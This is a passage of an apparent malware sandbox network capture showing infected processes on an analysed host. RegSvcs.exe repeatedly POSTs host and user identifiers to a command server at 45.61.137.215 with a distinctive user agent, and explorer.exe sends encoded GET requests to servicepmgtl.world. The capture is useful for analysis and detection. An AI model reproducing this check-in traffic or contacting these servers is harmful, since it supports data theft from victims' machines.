content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:44:06.246393919 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:44:06.246403933 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:44:06.246414900 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 29, 2024 15:44:06.246426105 CEST	896	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 29, 2024 15:44:06.246436119 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:44:06.246598005 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 29, 2024 15:44:06.246608019 CEST	448	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
May 29, 2024 15:44:06.246618032 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
May 29, 2024 15:44:06.246629000 CEST	1236	IN	Data Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.9	49759	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:44:06.434631109 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:44:06.442980051 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:44:09.020404100 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:44:06 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:44:09.020417929 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:44:09.020427942 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:44:09.020437956 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 29, 2024 15:44:09.020451069 CEST	896	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 29, 2024 15:44:09.020503998 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:44:09.020584106 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 29, 2024 15:44:09.020603895 CEST	448	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
May 29, 2024 15:44:09.020618916 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
May 29, 2024 15:44:09.020628929 CEST	224	IN	Data Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.9	49760	104.21.10.127	80	3504	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:44:07.397794008 CEST	176	OUT	GET /dn03/?KvOx3=JxIrrZbNPaA1C4PrhImOUNe+2n/09vmdrEF53puJ8yJ2Z/h/8YXf47jUpRM+pbGXlchT&LhEx=ODKXZDVpY2w8gpmp HTTP/1.1 Host: www.servicepmgtl.world Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 29, 2024 15:44:07.874742985 CEST	928	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 29 May 2024 13:44:07 GMT Content-Type: text/html Content-Length: 167 Connection: close Cache-Control: max-age=3600 Expires: Wed, 29 May 2024 14:44:07 GMT Location: https://www.servicepmgtl.world/dn03/?KvOx3=JxIrrZbNPaA1C4PrhImOUNe+2n/09vmdrEF53puJ8yJ2Z/h/8YXf47jUpRM+pbGXlchT&LhEx=ODKXZDVpY2w8gpmp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uhJKh%2FRobNIDR4dqwhLO8D4BGMhT1CZ8n9znLvd06P8zAcY8UsszWyJW9WXWUwTq%2FkShamnQksFrT30ySU%2FzEL4VEmQAFYWmCNgOFJtBGjuUEEtLzgHh8tCgGm5cLMqQImVJYVZEX3Lq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88b6ead8d9be19f3-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.9	49761	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:44:09.285919905 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:44:09.290848970 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:44:11.849642992 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:44:09 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:44:11.849659920 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:44:11.849670887 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:44:11.849680901 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 29, 2024 15:44:11.849694014 CEST	896	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 29, 2024 15:44:11.849771976 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:44:11.849782944 CEST	224	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w
May 29, 2024 15:44:11.849920988 CEST	1236	IN	Data Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5
May 29, 2024 15:44:11.849942923 CEST	1236	IN	Data Raw: 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 Data Ascii: --black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink)
May 29, 2024 15:44:11.849953890 CEST	1236	IN	Data Raw: 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 Data Ascii: --white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
